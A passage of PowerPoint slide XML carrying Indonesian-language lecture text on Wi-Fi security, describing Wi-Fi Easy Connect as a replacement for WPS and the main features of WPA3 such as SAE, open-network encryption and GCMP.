              <a:t>dengan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> WAP </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>menggunakan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kode</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> QR. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Setiap</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>perangkat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>klien</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kemudian</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dapat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dihubungkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dengan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>memindai</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kode</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> QR </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>atau</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> tag NFC di </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>aplikasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>konfigurator</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>. Selain </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>memperbaiki</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>masalah</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>keamanan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>terkait</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dengan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> WPS, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ini</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>adalah</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>cara</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mudah</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>untuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mengonfigurasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>perangkat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> Internet of Things (IoT) </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tanpa</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kepala</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dengan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>konektivitas</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> Wi-Fi.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-ID" b="1" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0"/>
              <a:t>Wi-Fi Protected Access 3 (WPA3)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>Baik WEP </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>maupun</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>versi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> WPA yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>asli</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tidak</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dianggap</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>cukup</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>aman</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>untuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>terus</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>digunakan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>. WPA2 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>menggunakan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sandi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> Advanced Encryption Standard (AES) </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dengan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kunci</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> 128-bit, yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>digunakan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dalam</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> Mode Konter </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dengan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> Cipher Block Chaining Message Authentication Code Protocol (CCMP). AES </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>menggantikan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> RC4 dan CCMP </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>menggantikan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> TKIP. CCMP </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>menyediakan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>enkripsi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>terautentikasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dirancang</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>untuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mempersulit</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>serangan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pemutaran</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ulang</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Kelemahan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ditemukan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> pada WPA2 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>menyebabkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>penggantinya</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>adalah</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> WPA3. Fitur </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>utama</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> WPA3 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>adalah</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sebagai</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>berikut</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="171450" indent="-171450">
              <a:buFontTx/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0"/>
              <a:t>Simultaneous Authentication of Equals (SAE)</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> - </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>menggantikan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>protokol</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pertukaran</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> Pre-Shared Key (PSK) di WPA2, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>memastikan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>penyerang</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tidak</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dapat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mencegat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> kata </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sandi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> Wi-Fi </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>bahkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ketika</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mengambil</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> data </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dari</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> login yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>berhasil</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="171450" indent="-171450">
              <a:buFontTx/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0" err="1"/>
              <a:t>Peningkatan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0" err="1"/>
              <a:t>lalu</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0" err="1"/>
              <a:t>lintas</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dienkripsi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>terbuka</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>antara</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>perangkat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>titik</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>akses</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>bahkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tanpa</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> kata </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sandi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>meningkatkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>privasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>keamanan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> pada </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>jaringan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>terbuka</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="171450" indent="-171450">
              <a:buFontTx/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0" err="1"/>
              <a:t>Protokol</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0" err="1"/>
              <a:t>Kriptografi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0" err="1"/>
              <a:t>diperbarui</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>-menggantikan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> AES CCMP </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dengan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> mode </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>operasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> AES Galois Counter Mode Protocol (GCMP). Metode </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>autentikasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>perusahaan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>harus</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>menggunakan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> AES 192-bit, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sedangkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>autentikasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pribadi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dapat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>menggunakan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> 128-bit </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>atau</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> 192-bit. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="171450" indent="-171450">
              <a:buFontTx/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0"/>
              <a:t>Wi-Fi Easy Connect</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>memungkinkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>menghubungkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>perangkat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dengan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>memindai</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kode</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> QR, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sehingga</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mengurangi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kebutuhan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>akan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>konfigurasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>rumit</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sekaligus</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mempertahankan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>koneksi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
